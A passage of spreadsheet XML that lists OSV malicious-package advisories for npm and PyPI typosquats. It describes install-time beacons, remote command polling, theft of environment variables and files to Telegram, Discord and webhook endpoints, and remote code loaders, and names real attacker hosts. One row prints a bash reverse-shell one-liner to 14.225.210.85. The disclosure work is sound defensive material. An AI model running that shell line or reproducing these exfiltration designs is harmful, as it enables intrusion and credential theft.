    </row>
    <row r="1662">
      <c r="A1662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1662" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16204</t>
        </is>
      </c>
      <c r="D1662" s="5" t="inlineStr"/>
      <c r="E1662" s="5" t="inlineStr"/>
      <c r="F1662" s="5" t="inlineStr"/>
      <c r="G1662" s="5" t="inlineStr"/>
      <c r="H1662" s="5" t="inlineStr"/>
      <c r="I1662" s="5" t="inlineStr"/>
      <c r="J1662" s="5" t="inlineStr"/>
      <c r="K1662" s="5" t="inlineStr"/>
      <c r="L1662" s="5" t="inlineStr">
        <is>
          <t>npm:@prime0/alanced-match</t>
        </is>
      </c>
      <c r="M1662" s="5" t="inlineStr"/>
      <c r="N1662" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1662" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1662" s="5" t="inlineStr"/>
      <c r="Q1662" s="5" t="inlineStr"/>
      <c r="R1662" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (53d49bf28eb233bca0591b32c11b411d1c10b8e8f978d1b76c6df2e6a00772f3)
The package @prime0/alanced-match is a 1-character-drop typosquat of balanced-match. Its postinstall.js runs automatically on npm install and POSTs a host fingerprint (hostname, username, platform, arch, cwd, node version, pid, non-internal IP addresses, uptime, package name) to the hardcoded bare-IP endpoint http://69.48.229.140:8080/b. Its main entry index.js opens a require-time HTTP polling channel to the same host, retrieves JSON commands from /c every 30 seconds (with 10-minute re-beacons), executes them via child_process.exec, and posts stdout/stderr back to /r — providing full remote code execution on the installer's machine. A source comment self-identifies the code as a 'Minimal stealth agent' and 'typosquat'.
</t>
        </is>
      </c>
      <c r="S1662" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16204</t>
        </is>
      </c>
    </row>
    <row r="1663">
      <c r="A1663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1663" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16205</t>
        </is>
      </c>
      <c r="D1663" s="5" t="inlineStr"/>
      <c r="E1663" s="5" t="inlineStr"/>
      <c r="F1663" s="5" t="inlineStr"/>
      <c r="G1663" s="5" t="inlineStr"/>
      <c r="H1663" s="5" t="inlineStr"/>
      <c r="I1663" s="5" t="inlineStr"/>
      <c r="J1663" s="5" t="inlineStr"/>
      <c r="K1663" s="5" t="inlineStr"/>
      <c r="L1663" s="5" t="inlineStr">
        <is>
          <t>npm:@prime0/inimatch</t>
        </is>
      </c>
      <c r="M1663" s="5" t="inlineStr"/>
      <c r="N1663" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1663" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1663" s="5" t="inlineStr"/>
      <c r="Q1663" s="5" t="inlineStr"/>
      <c r="R1663" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d094698410f0146ad3f51ff8860d657ca28b5f55b77ef9593b637b956996180f)
@prime0/inimatch is a typosquat of minimatch that behaves as a stealth remote-access agent. postinstall.js runs on npm install and POSTs a host fingerprint (hostname, username, platform/arch, cwd, node version, pid, non-internal IPs, uptime, package name) to http://69.48.229.140:8080/b. index.js, on require(), beacons the same fingerprint to /b and then every 30 seconds polls http://69.48.229.140:8080/c?id=... for a JSON command, passes the returned command string to child_process.exec, and POSTs stdout/stderr back to /r, giving the operator of that host arbitrary shell execution on the installer's machine. A source comment self-identifies the package as a stealth-agent typosquat, while package.json advertises only a 'small utility'.
</t>
        </is>
      </c>
      <c r="S1663" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16205</t>
        </is>
      </c>
    </row>
    <row r="1664">
      <c r="A1664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1664" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16206</t>
        </is>
      </c>
      <c r="D1664" s="5" t="inlineStr"/>
      <c r="E1664" s="5" t="inlineStr"/>
      <c r="F1664" s="5" t="inlineStr"/>
      <c r="G1664" s="5" t="inlineStr"/>
      <c r="H1664" s="5" t="inlineStr"/>
      <c r="I1664" s="5" t="inlineStr"/>
      <c r="J1664" s="5" t="inlineStr"/>
      <c r="K1664" s="5" t="inlineStr"/>
      <c r="L1664" s="5" t="inlineStr">
        <is>
          <t>npm:@prime0/pcomatch</t>
        </is>
      </c>
      <c r="M1664" s="5" t="inlineStr"/>
      <c r="N1664" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1664" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1664" s="5" t="inlineStr"/>
      <c r="Q1664" s="5" t="inlineStr"/>
      <c r="R1664" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (08299e41eb4feb9e324854bf5cd3386e6e52696b4b11443254374897a1ad3816)
index.js and the postinstall lifecycle script contact a hardcoded bare-IP endpoint at http://69.48.229.140:8080 over plain HTTP. On `npm install`, the postinstall hook collects host identifiers (hostname, username, platform, arch, cwd, node version, pid, all non-internal IP addresses, uptime, package name) and POSTs them as JSON to /b. On `require()` of the package main, the module beacons the same host, then polls /c every 30 seconds for JSON commands and executes the `c` field via child_process.exec, POSTing stdout/stderr back to /r. A source comment self-identifies the module as a stealth typosquat agent, while package.json advertises only a generic "small utility" description.
</t>
        </is>
      </c>
      <c r="S1664" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16206</t>
        </is>
      </c>
    </row>
    <row r="1665">
      <c r="A1665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1665" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16207</t>
        </is>
      </c>
      <c r="D1665" s="5" t="inlineStr"/>
      <c r="E1665" s="5" t="inlineStr"/>
      <c r="F1665" s="5" t="inlineStr"/>
      <c r="G1665" s="5" t="inlineStr"/>
      <c r="H1665" s="5" t="inlineStr"/>
      <c r="I1665" s="5" t="inlineStr"/>
      <c r="J1665" s="5" t="inlineStr"/>
      <c r="K1665" s="5" t="inlineStr"/>
      <c r="L1665" s="5" t="inlineStr">
        <is>
          <t>npm:chai-as-agile</t>
        </is>
      </c>
      <c r="M1665" s="5" t="inlineStr"/>
      <c r="N1665" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1665" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1665" s="5" t="inlineStr"/>
      <c r="Q1665" s="5" t="inlineStr"/>
      <c r="R1665" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (90d46bc75e0c086e929855baefd9f9f847ebe6e85f8a004c9de72502d0fb6263)
On require('chai-as-agile'), index.js loads lib/initializeCaller.js which decodes a base64-obfuscated URL to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df and POSTs the full contents of process.env to that endpoint with an 'x-secret-header' header. It then passes the HTTP response body to `new Function('require', response.data)` and invokes it with `require`, granting the endpoint operator arbitrary code execution in the consumer's Node process on every import. Any credentials present in the environment (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets) are transmitted verbatim to the attacker. The package name resembles the popular 'chai' assertion library, consistent with a typosquat lure.
</t>
        </is>
      </c>
      <c r="S1665" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16207</t>
        </is>
      </c>
    </row>
    <row r="1666">
      <c r="A1666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1666" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16208</t>
        </is>
      </c>
      <c r="D1666" s="5" t="inlineStr"/>
      <c r="E1666" s="5" t="inlineStr"/>
      <c r="F1666" s="5" t="inlineStr"/>
      <c r="G1666" s="5" t="inlineStr"/>
      <c r="H1666" s="5" t="inlineStr"/>
      <c r="I1666" s="5" t="inlineStr"/>
      <c r="J1666" s="5" t="inlineStr"/>
      <c r="K1666" s="5" t="inlineStr"/>
      <c r="L1666" s="5" t="inlineStr">
        <is>
          <t>npm:otel-span-adapter</t>
        </is>
      </c>
      <c r="M1666" s="5" t="inlineStr"/>
      <c r="N1666" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1666" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1666" s="5" t="inlineStr"/>
      <c r="Q1666" s="5" t="inlineStr"/>
      <c r="R1666" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9e800a0d88fb9a757c0ca5ecc09f0217522e72575d3e570a87c167090740de7d)
The package presents itself as an OpenTelemetry span adapter but on module load schedules a bootstrap routine via setImmediate that reads /proc/self/environ, enumerates all process.env entries via Object.entries(process.env), captures hostname, user, and cwd, and POSTs the resulting JSON snapshot to a hardcoded webhook.site inbox at https://webhook.site/e640206f-2da1-494b-bc38-d4dc37200d8b. The destination URL is assembled at runtime by joining the parts ["https://", "webhook.site", "/e640206f-..."] rather than appearing as a single literal, concealing the host from plain string search. Any process that requires this package leaks its full environment — which for Node services routinely contains AWS/GCP keys, database URIs, API tokens, and CI secrets — plus the raw initial environment from /proc/self/environ, to a third-party collector inbox controlled by the publisher.
</t>
        </is>
      </c>
      <c r="S1666" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16208</t>
        </is>
      </c>
    </row>
    <row r="1667">
      <c r="A1667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1667" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16209</t>
        </is>
      </c>
      <c r="D1667" s="5" t="inlineStr"/>
      <c r="E1667" s="5" t="inlineStr"/>
      <c r="F1667" s="5" t="inlineStr"/>
      <c r="G1667" s="5" t="inlineStr"/>
      <c r="H1667" s="5" t="inlineStr"/>
      <c r="I1667" s="5" t="inlineStr"/>
      <c r="J1667" s="5" t="inlineStr"/>
      <c r="K1667" s="5" t="inlineStr"/>
      <c r="L1667" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccsuc-meeb</t>
        </is>
      </c>
      <c r="M1667" s="5" t="inlineStr"/>
      <c r="N1667" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1667" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1667" s="5" t="inlineStr"/>
      <c r="Q1667" s="5" t="inlineStr"/>
      <c r="R1667" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8fb6207f1b4ec4d94c724583a5f32b85f68d203e1a9e6372705b410efbf9173a)
The package's postinstall lifecycle script (postinstall.js, wired via scripts.postinstall in package.json) checks the installer's hostname against a hardcoded allowlist value ('ubuntu-fc-uvm') and, on match, spawns /bin/bash with a reverse-shell one-liner opening an interactive TCP shell to 14.225.210.85:80. The script uses child_process.exec, includes retry logic and a 60-second timeout, and runs automatically on `npm install`. The hostname gate indicates a targeted-dropper shape aimed at specific installer environments; on matching hosts the operator obtains full interactive command execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="S1667" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16209</t>
        </is>
      </c>
    </row>
    <row r="1668">
      <c r="A1668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1668" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16210</t>
        </is>
      </c>
      <c r="D1668" s="5" t="inlineStr"/>
      <c r="E1668" s="5" t="inlineStr"/>
      <c r="F1668" s="5" t="inlineStr"/>
      <c r="G1668" s="5" t="inlineStr"/>
      <c r="H1668" s="5" t="inlineStr"/>
      <c r="I1668" s="5" t="inlineStr"/>
      <c r="J1668" s="5" t="inlineStr"/>
      <c r="K1668" s="5" t="inlineStr"/>
      <c r="L1668" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-pencc-meeb</t>
        </is>
      </c>
      <c r="M1668" s="5" t="inlineStr"/>
      <c r="N1668" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1668" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1668" s="5" t="inlineStr"/>
      <c r="Q1668" s="5" t="inlineStr"/>
      <c r="R1668" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3b4277c223cb7d5a9b8c263570a18670ee5054779862fbb801024a55629aa208)
postinstall.js is registered as the package's postinstall script and runs automatically on npm install. It compares os.hostname() to the hardcoded string 'ubuntu-fc-uvm' and, on a match, executes `bash -c "bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1"` via child_process, opening an interactive reverse shell to 14.225.210.85 on TCP port 80. The script includes retry logic and writes to /tmp/postinstall-revshell.log. The hostname gate suppresses activity on non-matching hosts, but the payload is shipped in every install of this version.
</t>
        </is>
      </c>
      <c r="S1668" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16210</t>
        </is>
      </c>
    </row>
    <row r="1669">
      <c r="A1669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1669" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16211</t>
        </is>
      </c>
      <c r="D1669" s="5" t="inlineStr"/>
      <c r="E1669" s="5" t="inlineStr"/>
      <c r="F1669" s="5" t="inlineStr"/>
      <c r="G1669" s="5" t="inlineStr"/>
      <c r="H1669" s="5" t="inlineStr"/>
      <c r="I1669" s="5" t="inlineStr"/>
      <c r="J1669" s="5" t="inlineStr"/>
      <c r="K1669" s="5" t="inlineStr"/>
      <c r="L1669" s="5" t="inlineStr">
        <is>
          <t>npm:swnwall</t>
        </is>
      </c>
      <c r="M1669" s="5" t="inlineStr"/>
      <c r="N1669" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1669" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1669" s="5" t="inlineStr"/>
      <c r="Q1669" s="5" t="inlineStr"/>
      <c r="R1669" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (70fb3b7b76f32b1c101b04c15933b403658f199267e9c3c34ebea9aba917949a)
On require/import, index.js invokes initialize() which spawns loader.js as a detached, hidden background child process (detached: true, windowsHide: true, stdio: 'ignore', unref'd) and records a.pid file to avoid re-spawning. loader.js performs an HTTPS GET against https://api.npoint.io/641d37178a880b1e8b8f (a user-editable JSON hosting service), base64-decodes the `code` field of the response, and executes the decoded payload via `new Function("require",..., decodedCode)(require, __dirname, __filename,...)`, granting the fetched code full access to Node's require, filesystem, and process APIs on the installer's machine. loader.js additionally monkey-patches Module.prototype.require to force windowsHide on all child_process spawn calls and reroute execSync through a hidden `cmd.exe /c`, concealing further child-process activity. The remote payload is mutable and attacker-controllable via the npoint.io endpoint.
</t>
        </is>
      </c>
      <c r="S1669" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16211</t>
        </is>
      </c>
    </row>
    <row r="1670">
      <c r="A1670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1670" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16212</t>
        </is>
      </c>
      <c r="D1670" s="5" t="inlineStr"/>
      <c r="E1670" s="5" t="inlineStr"/>
      <c r="F1670" s="5" t="inlineStr"/>
      <c r="G1670" s="5" t="inlineStr"/>
      <c r="H1670" s="5" t="inlineStr"/>
      <c r="I1670" s="5" t="inlineStr"/>
      <c r="J1670" s="5" t="inlineStr"/>
      <c r="K1670" s="5" t="inlineStr"/>
      <c r="L1670" s="5" t="inlineStr">
        <is>
          <t>PyPI:cli-anything-ai-market</t>
        </is>
      </c>
      <c r="M1670" s="5" t="inlineStr"/>
      <c r="N1670" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1670" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1670" s="5" t="inlineStr"/>
      <c r="Q1670" s="5" t="inlineStr"/>
      <c r="R1670" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c5319f74a06670d40b020831dae38da696aa966dc1fdfde45063abb0024df922)
setup.py runs automatically during `pip install` and POSTs the installer's OS, username (USER/USERNAME), and hostname (via COMPUTERNAME on Windows or the `hostname` command on POSIX) as form-encoded data to the hardcoded plaintext HTTP endpoint http://182.92.143.23/collect.php. The package declares `packages=[]` and ships no importable code implementing the advertised CLI, so the beacon is the sole install-time behavior. The destination is a bare-IP HTTP endpoint unrelated to any legitimate PyPI or vendor infrastructure, and the collected fields identify the installer's machine and account.
## Source: kam193 (102c2da9fcddf1e398e47d284721f74769e1b5f4c8806570b253a5cc426396e2)
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research &amp; co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="S1670" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16212</t>
        </is>
      </c>
    </row>
    <row r="1671">
      <c r="A1671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1671" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16213</t>
        </is>
      </c>
      <c r="D1671" s="5" t="inlineStr"/>
      <c r="E1671" s="5" t="inlineStr"/>
      <c r="F1671" s="5" t="inlineStr"/>
      <c r="G1671" s="5" t="inlineStr"/>
      <c r="H1671" s="5" t="inlineStr"/>
      <c r="I1671" s="5" t="inlineStr"/>
      <c r="J1671" s="5" t="inlineStr"/>
      <c r="K1671" s="5" t="inlineStr"/>
      <c r="L1671" s="5" t="inlineStr">
        <is>
          <t>npm:discord-players</t>
        </is>
      </c>
      <c r="M1671" s="5" t="inlineStr"/>
      <c r="N1671" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1671" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1671" s="5" t="inlineStr"/>
      <c r="Q1671" s="5" t="inlineStr"/>
      <c r="R1671" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3eadb25768efba4ff9dc9170a838f90f6572993195d37e526543fa956e65faa2)
index.js is the package main and unconditionally starts a backup loop at module top level. On require, BackupManager zips process.cwd() (excluding node_modules,.git, archives) via archiver and uploads the archive with Telegraf's sendDocument to a hardcoded Telegram bot token ('8837512876:AAHX...') and chat_id '7549282259' shipped in src/config.js. The loop repeats every 60 minutes, continuously exfiltrating the installer's project tree (including any.env files, credentials, and source code) to the attacker's Telegram chat. The package is named 'discord-players' with description 'idk' but ships a 'tg-backup' CLI; the README documents a user-configured TG_BOT_TOKEN via a setup wizard that writes.env, and bin/setup.js does write a.env, but config.js ignores process.env entirely and always uses the hardcoded token and chat_id — the env-configuration story is a cover for hardcoded exfiltration to the author's chat.
</t>
        </is>
      </c>
      <c r="S1671" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16213</t>
        </is>
      </c>
    </row>
    <row r="1672">
      <c r="A1672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1672" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16214</t>
        </is>
      </c>
      <c r="D1672" s="5" t="inlineStr"/>
      <c r="E1672" s="5" t="inlineStr"/>
      <c r="F1672" s="5" t="inlineStr"/>
      <c r="G1672" s="5" t="inlineStr"/>
      <c r="H1672" s="5" t="inlineStr"/>
      <c r="I1672" s="5" t="inlineStr"/>
      <c r="J1672" s="5" t="inlineStr"/>
      <c r="K1672" s="5" t="inlineStr"/>
      <c r="L1672" s="5" t="inlineStr">
        <is>
          <t>npm:discord-resolvers</t>
        </is>
      </c>
      <c r="M1672" s="5" t="inlineStr"/>
      <c r="N1672" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1672" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1672" s="5" t="inlineStr"/>
      <c r="Q1672" s="5" t="inlineStr"/>
      <c r="R1672" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6aa01ed90340a9458c2906ec74fd9277bb7d0e4da48ef09487639aa6c45e6791)
The package published as discord-resolvers is unrelated to Discord. On require, index.js invokes startBackupLoop() at top level, which recursively archives the /root directory on Linux (or the drive root, typically C:\, on Windows) into a ZIP and uploads it via the Telegram Bot API to a hardcoded chat controlled by the package author. The loop repeats every hour and all errors are silently swallowed. The exclude list (node_modules,.git,.cache, tmp) does not exclude credential-bearing paths such as ~/.ssh, ~/.aws, ~/.npmrc,.env files, browser profiles, or wallet stores, so SSH keys, cloud credentials, source code, and other secrets under the archived root are shipped off-host. The Telegram bot token (8296271388:AAH-...) and chatId (8851479019) ship in cleartext in config.json and are the transport mechanism for the exfiltration; the destination is not caller-configurable. The package.json description ("Cross-platform automated server backup tool with Telegram delivery") self-labels the behavior but the package name and the silent auto-execution on require make this a covert exfiltration payload rather than an opt-in backup tool.
</t>
        </is>
      </c>
      <c r="S1672" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16214</t>
        </is>
      </c>
    </row>
    <row r="1673">
      <c r="A1673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1673" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16215</t>
        </is>
      </c>
      <c r="D1673" s="5" t="inlineStr"/>
      <c r="E1673" s="5" t="inlineStr"/>
      <c r="F1673" s="5" t="inlineStr"/>
      <c r="G1673" s="5" t="inlineStr"/>
      <c r="H1673" s="5" t="inlineStr"/>
      <c r="I1673" s="5" t="inlineStr"/>
      <c r="J1673" s="5" t="inlineStr"/>
      <c r="K1673" s="5" t="inlineStr"/>
      <c r="L1673" s="5" t="inlineStr">
        <is>
          <t>npm:engin1</t>
        </is>
      </c>
      <c r="M1673" s="5" t="inlineStr"/>
      <c r="N1673" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1673" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1673" s="5" t="inlineStr"/>
      <c r="Q1673" s="5" t="inlineStr"/>
      <c r="R1673" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1e843727c643c5d966acaa66461f7e392813a4284cd8181b4bb9b24ddfb8447a)
The package's main entrypoint (index.js) invokes an initializer at top level that spawns loader.js as a detached background Node process on every require/import. loader.js issues an HTTPS GET to https://api.npoint.io/24c25d5f5fcbb0992a4f, base64-decodes the JSON `code` field, and passes the decoded string to `new Function(require, __dirname, __filename, module, exports,...)`, executing attacker-controlled JavaScript with full Node privileges as the installing user. The endpoint URL is stored in a variable named `API_KEY` to disguise its nature, and the manifest/README advertise a runtime/system-info utility with a `getRuntimeInfo()` API that does not exist in the shipped code. The api.npoint.io document is attacker-mutable, unauthenticated, and unpinned, so whoever controls that bin controls what runs on any host importing this package.
</t>
        </is>
      </c>
      <c r="S1673" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16215</t>
        </is>
      </c>
    </row>
    <row r="1674">
      <c r="A1674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1674" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16216</t>
        </is>
      </c>
      <c r="D1674" s="5" t="inlineStr"/>
      <c r="E1674" s="5" t="inlineStr"/>
      <c r="F1674" s="5" t="inlineStr"/>
      <c r="G1674" s="5" t="inlineStr"/>
      <c r="H1674" s="5" t="inlineStr"/>
      <c r="I1674" s="5" t="inlineStr"/>
      <c r="J1674" s="5" t="inlineStr"/>
      <c r="K1674" s="5" t="inlineStr"/>
      <c r="L1674" s="5" t="inlineStr">
        <is>
          <t>npm:tetomood</t>
        </is>
      </c>
      <c r="M1674" s="5" t="inlineStr"/>
      <c r="N1674" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1674" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1674" s="5" t="inlineStr"/>
      <c r="Q1674" s="5" t="inlineStr"/>
      <c r="R1674" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6c09686feb7c38e815ef9a615a6ceba2444029a34ea9d6bee8598a76bc8e8f92)
package.json declares both preinstall and postinstall scripts that invoke wget to POST the installer's current working directory ($(pwd)) and machine hostname ($(hostname)) to a hardcoded Discord webhook endpoint on discord.com at install time. The tarball ships only package.json (611 bytes); the declared main entry index.js is absent, so the package has no legitimate functionality — the lifecycle beacons are its sole purpose. Installing the package causes automatic host reconnaissance data to be sent to an author-controlled remote endpoint without consent.
</t>
        </is>
      </c>
      <c r="S1674" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16216</t>
        </is>
      </c>
    </row>
    <row r="1675">
      <c r="A1675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1675" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16217</t>
        </is>
      </c>
      <c r="D1675" s="5" t="inlineStr"/>
      <c r="E1675" s="5" t="inlineStr"/>
      <c r="F1675" s="5" t="inlineStr"/>
      <c r="G1675" s="5" t="inlineStr"/>
      <c r="H1675" s="5" t="inlineStr"/>
      <c r="I1675" s="5" t="inlineStr"/>
      <c r="J1675" s="5" t="inlineStr"/>
      <c r="K1675" s="5" t="inlineStr"/>
      <c r="L1675" s="5" t="inlineStr">
        <is>
          <t>npm:tetotest</t>
        </is>
      </c>
      <c r="M1675" s="5" t="inlineStr"/>
      <c r="N1675" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1675" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1675" s="5" t="inlineStr"/>
      <c r="Q1675" s="5" t="inlineStr"/>
      <c r="R1675" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b181542b0c55a472e316ca973cc5b1deaf31986645fd326903e8c31ab20acab6)
package.json declares preinstall and postinstall lifecycle scripts that invoke wget to POST the installer's shell-expanded working directory ($(pwd)) and machine hostname ($(hostname)) to a hardcoded Discord webhook at https://discord.com/api/webhooks/1413937656697720862/&lt;redacted&gt;. Both hooks fire automatically on `npm install` without user interaction. The package ships no library code or documented functionality — its sole effect is beaconing installer host identifiers to an attacker-controlled Discord endpoint.
</t>
        </is>
      </c>
      <c r="S1675" s="6" t="inlineStr">
        <is>
